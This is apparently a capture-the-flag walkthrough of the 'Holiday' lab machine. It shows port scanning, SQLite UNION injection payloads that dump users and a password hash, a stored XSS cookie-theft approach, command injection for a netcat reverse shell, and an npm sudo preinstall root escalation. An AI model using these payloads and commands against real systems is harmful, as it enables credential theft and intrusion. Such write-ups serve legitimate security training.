Holiday
Last updated
Was this helpful?
Last updated
Was this helpful?
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.25 -oN allPorts
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,8000 10.10.10.25 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.
The website shows a simple image.
Let's use dirsearch to enumerate subdirectories.
dirsearch -u http://10.10.10.25:8000/
There is one login page.
Try to log in with the username and password test, and intercept the request with BurpSuite.
It looks like the site is vulnerable to SQL injection attacks, because if we add the " character to the username, the site will crash.
As we can see, it is an SQLite 3.15.0 database.
username=admin")) union select 1,sqlite_version(),3,4-- -&password=test
The database has four tables.
username=admin")) union select 1,group_concat(tbl_name),3,4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -&password=test
The users table has one column called username and another one called password.
username=admin")) union select 1,group_concat(sql),3,4 FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -&password=test
There is one user called RickA.
username=admin")) union select 1,group_concat(username),3,4 FROM users-- -&password=test
We can get his password hash.
username=admin")) union select 1,group_concat(password),3,4 FROM users-- -&password=test
We can get the password from the hash using crackstation.
Using the found credentials, we'll be able to access the site and see a list of bookings.
Each booking has Notes section where we can submit notes that an administrator will approve.
Let's try to add an img HTML tag with a python server as the source.
python -m http.server 80
After a minute we'll see a request in our HTTP server, which means that the site is vulnerable to XSS.
We need to find a way to steal the administrator cookies. If we inject a simple payload such as the following, we'll see that it gets encoded.
<script>alert('XSS')</script>
I found a way to bypass this restriction. First, create the pwn.js file with the following code.
nano pwn.js
Then, set a netcat listener on port 8000.
nc -lvnp 8000
Now, we need to submit a payload which will be encoded by the encoder.py script.
nano encoder.py
Run the python script to get the final payload.
python encoder.py
Submit the payload as a note.
On port 8000 we'll get the content of the booking seen as the administrator.
Using a URL decoder, we'll see the administrator cookie.
By changing our cookie to the administrator one, we'll see one more section called Admin.
There was one directory called /admin, let's check it out.
Click on Bookings, and intercept the request with BurpSuite.
If we try to inject a " character, we'll see that there is a whitelist of characters allowed.
One of the characters is &. If we URL encode it and inject a command after it, we'll see that the command gets executed.
Time to get a shell. First, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.
There is one problem. We can not send the reverse shell directly from the request because we can not specify an IP address because the . character is not allowed. But we could specify the IP address in hexadecimal. Use python to get the hexadecimal values.
python
The final string will be 0x0a0a0e08. Now, create the following file where the HTTP server is located.
nano shell
Now, download the file from the server.
Finally, run the script to get access to the server as algernon. Then we'll be able to grab the user flag.
If we check the sudo permissions, we'll see that we can run npm as root.
sudo -l
There is one way to get a shell as root with this permission. First, run these two commands.
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
Finally, run npm with root permissions, and then all we have to do is reap the harvest and take the root flag.
sudo /usr/bin/npm i -C $TF --unsafe-perm
